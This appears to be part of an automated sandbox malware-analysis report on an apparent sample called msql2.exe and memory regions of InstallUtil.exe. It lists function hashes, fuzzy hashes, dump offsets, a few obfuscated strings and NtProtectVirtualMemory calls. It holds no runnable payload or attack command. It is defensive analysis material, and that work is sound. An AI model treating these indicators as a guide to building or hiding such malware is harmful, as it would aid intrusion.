Opcode ID: b42eb4a4237f3f300b34101a9c64c7a2a34653e472d88958374a96a308d26003
Instruction ID: 0a79cfcc9f3950630def7aa8d5064f7db411a5ec17eeb1af5eeabda724e68817
Opcode Fuzzy Hash: b42eb4a4237f3f300b34101a9c64c7a2a34653e472d88958374a96a308d26003
Instruction Fuzzy Hash: 8EC012752082209F9244DA08C840C66B3AAFBC8210B14C84EE85083300CBA2EC07CBA0

Function 056CC969 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4171155113.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_56c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e54cab3840e1602380798b68ea0931076d35c68c33f34fc0bcee7c18f5d669fe
Instruction ID: 80f40858ad1d23d6b48f2ecdd1fe45985b83b4c0001ef66a8090a9d041220e18
Opcode Fuzzy Hash: e54cab3840e1602380798b68ea0931076d35c68c33f34fc0bcee7c18f5d669fe
Instruction Fuzzy Hash: D1D092381092809FC242CF14C960861BBA1AB8A218B18C4CAE9984B362CA329853EB21

Function 056CF170 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4171155113.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_56c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec58beea3709d4ec266ca1290e173da45b6cb0ab0639c6716a909ed588393dd4
Instruction ID: 221628fb69f68530d371504cba93a0c8ec1878c7f408c2b422a9ca6fe2b3f1f3
Opcode Fuzzy Hash: ec58beea3709d4ec266ca1290e173da45b6cb0ab0639c6716a909ed588393dd4
Instruction Fuzzy Hash: F5C08CF2A040005BCA50C928CC4270073928798510F18C058D849C7346DA27E8038281

Function 0698242D Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4176845493.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6980000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2f4cafeef0fb1f9fdbc8ec4ae6205d68ac6717dd7706ecf31b1755cf583cb48
Instruction ID: 3a39edce61ead8427808996f6346918536007b957d8a5ace48a8b4875e7b83c0
Opcode Fuzzy Hash: b2f4cafeef0fb1f9fdbc8ec4ae6205d68ac6717dd7706ecf31b1755cf583cb48
Instruction Fuzzy Hash: AAD09E3450410DDFDB509F44D548BA87BB2BB04315F6044A5D201DA940C3B69BC4DF51

Function 06904FC8 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4176148303.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6900000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 244305bd90b5a26f59242cc0f2ef7b58ff1d51a5d7eebd463c6ae9d6e8f7a69a
Instruction ID: a74544982d7aaa8a968b6088a30883664ea3f0edf1fc07267773f14efb813ff1
Opcode Fuzzy Hash: 244305bd90b5a26f59242cc0f2ef7b58ff1d51a5d7eebd463c6ae9d6e8f7a69a
Instruction Fuzzy Hash: 98C04C75148508DFA7409B54D948C2977FDAB14B247118561F7094BE71C632EC60EA94

Function 069090F0 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4176148303.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6900000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b0139783e11ebd72164bcb60225f4a6c050bd7806f961e3e8f295b63e9fa809
Instruction ID: e8e969b04dcfae25b8b0f4ff0165242dd3d4a6fe7268415c0cc95dfa9bdd8a1d
Opcode Fuzzy Hash: 7b0139783e11ebd72164bcb60225f4a6c050bd7806f961e3e8f295b63e9fa809
Instruction Fuzzy Hash: F6C08C35148208CFA3808F18E894C247778AB053203004490F5094BA73CA31ED208A80

Function 06964D1B Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4176728675.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6960000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6ce0eba55739b7ae330f25596bf3d8e133c5c6fe4beadf540eea27868cfe21b
Instruction ID: 5212f7b74e7a1020f73a583cbf110077e2d6e47fb6ca9c809497e734cbc53010
Opcode Fuzzy Hash: f6ce0eba55739b7ae330f25596bf3d8e133c5c6fe4beadf540eea27868cfe21b
Instruction Fuzzy Hash: C4C012319002498F8F41DBF8D5556AC7BF1AA54304B008515A006CF315D93C9E5D5701

Function 06967B3E Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4176728675.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6960000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9701c21805a84f340f8be923a80928e65ce757886256c75a5d9409012df4e6c5
Instruction ID: d01fd2f42aa68bbafd95b77356e5bd9975be2e7b5f32b3d7e66213489087e10c
Opcode Fuzzy Hash: 9701c21805a84f340f8be923a80928e65ce757886256c75a5d9409012df4e6c5
Instruction Fuzzy Hash: 1FD012305006598FDF50DFF9C94466C7BE5BE44314705455FD141DF758EA74DA058780

Function 056CF762 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4171155113.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_56c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 585f173a88682edb591f38085ddb87524ca6d06d5d3168005accf1fb72a2b22a
Instruction ID: d52db30fa92cdebd579c5d8a652cd3589fda5782451364bb7820608d21446de5
Opcode Fuzzy Hash: 585f173a88682edb591f38085ddb87524ca6d06d5d3168005accf1fb72a2b22a
Instruction Fuzzy Hash: 05C012B6A483008B8240DE84E841C06B3A2BBD8660B158C0AE95083352CB32D80BCA64

Function 00E031BE Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4148316883.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e00000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c60882e3cd1425d46903c9788b3a121bf1d0ff836feb8bba19bca16091c75678
Instruction ID: ebc5335f18142f04c60dc5cd8494cad016287b16f65ff298f2ed588294c9dbf7
Opcode Fuzzy Hash: c60882e3cd1425d46903c9788b3a121bf1d0ff836feb8bba19bca16091c75678
Instruction Fuzzy Hash: 0BC04C35A01508EBEF119BD4DC48DEEBB72EF98310F104115F516B72A5EB764C57AE40

Function 069130AD Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4176276008.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6910000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b7bdd2eb51a762479d27a95e8d9826fe8788b749c2e77c9aacfd6d379234fea
Instruction ID: 96defc4f6f1562ea851273b74c67bb545a1893deb674641809c9a638cc4ca0a2
Opcode Fuzzy Hash: 1b7bdd2eb51a762479d27a95e8d9826fe8788b749c2e77c9aacfd6d379234fea
Instruction Fuzzy Hash: 18C01231A4801E8EA399E61449100DDF2E25BC8210B2ECA62C026ABF50EE268E8282D0

Function 06947FC0 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4176492111.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6940000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf558301ead944a4fa18cd2593725db67891bace1ea8a7ee2574d0a9f222334c
Instruction ID: e8e7d6753059ca2b3603d19b331fcd00a267d39fc0a58d959b975d21bc9a6a64
Opcode Fuzzy Hash: bf558301ead944a4fa18cd2593725db67891bace1ea8a7ee2574d0a9f222334c
Instruction Fuzzy Hash: FCC092322A13288F8744DFBAE945D6177ECAF08A2535140E5F508CB372DA25F8448A50

Function 06908DE9 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4176148303.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6900000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa1daba45fcc0f326b2c8a567beffc4a6a475c225a0afa3e0971a1326ba12cf5
Instruction ID: 873384fa6295319de8216781bc3b2315a9e322439f046a5b1d08b35b56c5c691
Opcode Fuzzy Hash: aa1daba45fcc0f326b2c8a567beffc4a6a475c225a0afa3e0971a1326ba12cf5
Instruction Fuzzy Hash: 6CC0801D20D191CFFF534B189C44FF53E315751100FC44547E04709452C1500829A744

Function 0699046E Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4176899731.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6990000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2700479e0650ca241ac444fc74005afea9b2a187aed08c3ecd17cf1f3c151555
Instruction ID: 76e32de146a57d92383f7c608ed74e448f90f834e0ff9cdf5769701f44b7a9ef
Opcode Fuzzy Hash: 2700479e0650ca241ac444fc74005afea9b2a187aed08c3ecd17cf1f3c151555
Instruction Fuzzy Hash: 3ED0923890011ADFDF14CF98D88449CBBB1BB0C340F108556D84272311D7315C51CEA0

Function 06993200 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4176899731.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6990000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 992ee6b61d6bf3ce80186cc87823e3d5983a3adf28d7aa6b9ed60b61a46bf545
Instruction ID: a470d2c588a0d654cf6c27a214b48a0610d989314a17e514c74a6935f7a31b65
Opcode Fuzzy Hash: 992ee6b61d6bf3ce80186cc87823e3d5983a3adf28d7aa6b9ed60b61a46bf545
Instruction Fuzzy Hash: 15C04C75140208AFC700DF55D845D457B69EB19760F014091F6044B271C672E850DA54

Function 06903629 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4176148303.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6900000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 748cd91730fdadc8fb9e67f77f874158438a9e3698a5d9e5a217e2ed7c81c03d
Instruction ID: a449e5c9c27b3d8b6f3acd7dac7b65c2d465fd089c69cbb48cf50560eefbaebb
Opcode Fuzzy Hash: 748cd91730fdadc8fb9e67f77f874158438a9e3698a5d9e5a217e2ed7c81c03d
Instruction Fuzzy Hash: D5B0921014AA900FC2030F204C1058A3E614A1390034608DAE0C0CF193C11A8A4983A2

Function 06901D70 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4176148303.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6900000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38cbaf807a4b8bb1f881d698f404bb680748e2b06ba68e039caf3cccc44c2461
Instruction ID: b105495a1c689d27f29738e165264f2de37cb4b59ad51c6b52970ac1fbd2c00c
Opcode Fuzzy Hash: 38cbaf807a4b8bb1f881d698f404bb680748e2b06ba68e039caf3cccc44c2461
Instruction Fuzzy Hash: 43B01214019580CBE782EB34C9C411CAFAB6FC62847A10C91C082DEDA2D42B98404330

Function 06900BEE Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4176148303.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6900000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7808bb6a3c98dea1ec6ca71fd47a5f601df5758a39ab9f2a143867cc4d1d25ec
Instruction ID: a293210d6feced5c797c785b430b250ae77469b19bac92e44536936fbf4aae52
Opcode Fuzzy Hash: 7808bb6a3c98dea1ec6ca71fd47a5f601df5758a39ab9f2a143867cc4d1d25ec
Instruction Fuzzy Hash: 38C00234904114CFFB648B90CC447ADBB31FB45311F608555C85663655C7715C87DF45

Function 06998EB8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4176899731.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6990000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10

Function 06991032 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4176899731.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6990000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d90ff4bd814c9e9f23191ef4c2b5a7f0b87c92d133cba65c98f5e738fab0c810
Instruction ID: 99983b9cd82cc870f833443c01cb0a35ac0d106a74c9835ba12d4081935d6807
Opcode Fuzzy Hash: d90ff4bd814c9e9f23191ef4c2b5a7f0b87c92d133cba65c98f5e738fab0c810
Instruction Fuzzy Hash: 54C08C3400110ACEDF259B388D5A24A3FB86705220F8442864896423EBE7202101AA31

Function 056CA620 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4171155113.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_56c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10

Function 06909D08 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4176148303.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6900000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56f566a46b90cb7a408febdfd7d62470c4b710cedd0411d7366bdacf476781e5
Instruction ID: 135df5c0ce4cd9e4675c26e024927ffe08c1d612713d0f2079118325d0ae12ed
Opcode Fuzzy Hash: 56f566a46b90cb7a408febdfd7d62470c4b710cedd0411d7366bdacf476781e5
Instruction Fuzzy Hash: 23B09232000208EB86009B84ED14C56BB69AB58700740C025A609061218B72A862DA94

Function 06942EC0 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4176492111.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6940000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ab4bbdd17a120ddc1ef3c4cf224515beb75f8373d4b4482147fda78e6e90976
Instruction ID: 20159973dc6c4478fa717a34ac84a2881d4813b9dc5cbab7339b5de6a68ee492
Opcode Fuzzy Hash: 8ab4bbdd17a120ddc1ef3c4cf224515beb75f8373d4b4482147fda78e6e90976
Instruction Fuzzy Hash: 0DB01231250208CFC300DB6CE444C0033FCAF4DA1431000D0F10C8B331C721FC008A40

Function 06947F80 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4176492111.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6940000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b76679b0a354449729844e828cdbdd8dc5f87ab3334555cc76ca9f307cd6f9ad
Instruction ID: a0ccf6e4bed68dc0c69f5d0bbd707ad7c253f4111acce2a0e91a8f8d8fd4bd45
Opcode Fuzzy Hash: b76679b0a354449729844e828cdbdd8dc5f87ab3334555cc76ca9f307cd6f9ad
Instruction Fuzzy Hash: 03B092351602088F82409B68E448C00B3E8AB08A243118090E10C8B232C621F8008A40

Function 06947FA0 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4176492111.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6940000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 418804ba49e1aebc8fa1d3dc0919575ec75d589b23f2178018c5335086f87319
Instruction ID: 9c1d638d28ae4b7c3dd7acd5f35345a8f978fe62c4878920a0d217ca8927f91a
Opcode Fuzzy Hash: 418804ba49e1aebc8fa1d3dc0919575ec75d589b23f2178018c5335086f87319
Instruction Fuzzy Hash: B2B01230260208CFC200DB5DD444C0033FCBF49E0434000D0F1088B731C721FC008A40

Function 06998EA9 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4176899731.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6990000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9eaec32de7d66e98de73e5312a0cbf522f4cc7ea6ab4160ad7e466f20b36ee17
Instruction ID: 82f660a88fc588be17e834385da12cc5a21064fafad6b361b4022bd581a9d254
Opcode Fuzzy Hash: 9eaec32de7d66e98de73e5312a0cbf522f4cc7ea6ab4160ad7e466f20b36ee17
Instruction Fuzzy Hash: BAC0483520E3C04FC3238B388890889BFA05E0210432A04EB80D0CB493D311A928C712

Function 06997AEB Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4176899731.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6990000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1e336116ae09a856c0075db6e5f3a707b4dc518e27d405e260cd6cffec6d7ac
Instruction ID: 482cccf18502ae3a36b47044dd5c41111e33c2a95c27304013a60ca5d1932231
Opcode Fuzzy Hash: a1e336116ae09a856c0075db6e5f3a707b4dc518e27d405e260cd6cffec6d7ac
Instruction Fuzzy Hash: 38B012303001008BDB455F7CD45405E37236F84218334C324AD0A87228CF348D43C686

Function 056CF59B Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4171155113.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_56c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c43309f30ad7908dd478bbbddd88df592a68554044613b0ee8ce53eadfae0205
Instruction ID: 21b400e880f9e45306feea00e99ac1f653a282cbb008e94e4c4b97f12e8881bc
Opcode Fuzzy Hash: c43309f30ad7908dd478bbbddd88df592a68554044613b0ee8ce53eadfae0205
Instruction Fuzzy Hash: E5B012312040005B8244DA08DC81408B362DFC4314318C89D6408CB385CF33DC038640

Function 06940450 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4176492111.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6940000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c69168654bc74f05253a2607b33a3e152bb733fa528a73e25a5d07a96f67e6e9
Instruction ID: 26f3acae34c60b6cb0c8d168c3bade06db25481c8b07a84a3ce7be2645a646cd
Opcode Fuzzy Hash: c69168654bc74f05253a2607b33a3e152bb733fa528a73e25a5d07a96f67e6e9
Instruction Fuzzy Hash: F8A012228500155FE2403720140850823D1A0082B1304CB009E07C13619D1868015980

Function 056CF5FB Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4171155113.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_56c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58f842f136f8871d3293e0bbd1c936179e0d76aa282faecbcc5251158e6baaf4
Instruction ID: f55faf25faaddd71acbbadcae126e72aab15111eef0db5ce514969dbd84d89f8
Opcode Fuzzy Hash: 58f842f136f8871d3293e0bbd1c936179e0d76aa282faecbcc5251158e6baaf4
Instruction Fuzzy Hash: 2AA011382000008B8A00CA00C882808B320EB80208328C088AA088B30ACB23EC03CB00

Function 00E00940 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4148316883.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e00000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcf9f2e3540df2f4e0575bf779239a1511472f88a980828a0238ae94d09e0ec8
Instruction ID: cef00d6ee7c1ee3677d3307df24a4a4c31075b4c9d3ee0be09b2a1191fc35f43
Opcode Fuzzy Hash: fcf9f2e3540df2f4e0575bf779239a1511472f88a980828a0238ae94d09e0ec8
Instruction Fuzzy Hash: 4990223000020C8B008023C83808080333C800002A3C00000E00C008000A8020000280

Function 069843A0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4176845493.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6980000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44

Function 069422A0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4176492111.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6940000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d91d072594236d96c9ee8e2cff0d993098e5087d161b52541f5f61981ba52f2b
Instruction ID: 9dcac014e12f670b54d422fa6e2390dc8da0ade1ceacc250d8b55380720c8b33
Opcode Fuzzy Hash: d91d072594236d96c9ee8e2cff0d993098e5087d161b52541f5f61981ba52f2b
Instruction Fuzzy Hash: 4F900235054A0C8B4940279A740A555B75D9556626B804051B60D415035A7A74104BD5

Function 06942BD0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4176492111.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6940000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a68b83958090a69ead37a6540f231e63580fb7597cfe473d7d1fe490bd2697e
Instruction ID: 4aeb99a28de24c26621153c9a7636dcf01d105798444bdef8c960d4b5fd2e838
Opcode Fuzzy Hash: 5a68b83958090a69ead37a6540f231e63580fb7597cfe473d7d1fe490bd2697e
Instruction Fuzzy Hash: BC90023505460C8F45412795754956577AD9549625B800091FA5D416015A5974104AD5

Function 069840F0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4176845493.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6980000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40

Analysis Process: msql2.exePID: 2140, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	11.6%
Dynamic/Decrypted Code Coverage:	96.9%
Signature Coverage:	0%
Total number of Nodes:	226
Total number of Limit Nodes:	13

Executed Functions

Function 00F778A0 Relevance: 6.0, Strings: 4, Instructions: 983
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te^q, xrefs: 00F77FC3
TJcq, xrefs: 00F77A42
xbaq, xrefs: 00F779CD
pbq, xrefs: 00F7845A

Memory Dump Source

Source File: 00000002.00000002.1867234639.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f70000_msql2.jbxd

Similarity

API ID:
String ID: TJcq$Te^q$pbq$xbaq
API String ID: 0-1954897716
Opcode ID: 1767ff58212d88abcf61be0c5c9e5a48e506969f1a3336244c21a6b1f7ada5c6
Instruction ID: 2fd748ad73c34cd84c4425a337a0821292a5645af5208f67e4cc6219f6618771
Opcode Fuzzy Hash: 1767ff58212d88abcf61be0c5c9e5a48e506969f1a3336244c21a6b1f7ada5c6
Instruction Fuzzy Hash: 61A2B675A00228CFDB54DF69C984A99BBB2FF89304F1581E9D50DAB325DB319E81DF40

Function 060FE280 Relevance: 1.6, APIs: 1, Instructions: 107nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 060FE33D

Memory Dump Source

Source File: 00000002.00000002.1889134451.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_60f0000_msql2.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 02f5303fdac7ba0f8845fcdf5dbb2c126531536979651fad57ecf8abf2f2f363
Instruction ID: f4c93eaac64ad17d388f707dd86ab65c598d34c9e6df2c1c19ab47d43b6dff66
Opcode Fuzzy Hash: 02f5303fdac7ba0f8845fcdf5dbb2c126531536979651fad57ecf8abf2f2f363
Instruction Fuzzy Hash: 7B4199B9D00258DFCF10CFA9D984ADEFBB1BB49310F14902AE914B7210D735A946CF68

Function 060FE288 Relevance: 1.6, APIs: 1, Instructions: 105nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 060FE33D

Memory Dump Source

Source File: 00000002.00000002.1889134451.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_60f0000_msql2.jbxd

Similarity

